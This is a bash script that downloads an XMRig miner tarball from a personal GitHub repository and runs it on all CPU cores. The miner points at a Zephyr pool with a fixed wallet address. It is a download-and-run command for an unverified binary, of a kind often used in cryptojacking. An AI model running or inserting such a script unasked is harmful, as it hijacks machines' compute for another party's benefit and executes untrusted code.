#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHsCWzL5oF22SEvxU16yZfvCnopSX3UETMuLyu7ms3598rzpFu5MhLka7PAynmq5HSaKTZdfxfjEmGQ2Z38rwvTYj5wBJk1h5 -p pagi16 -a rx/0 -t $(nproc --all)
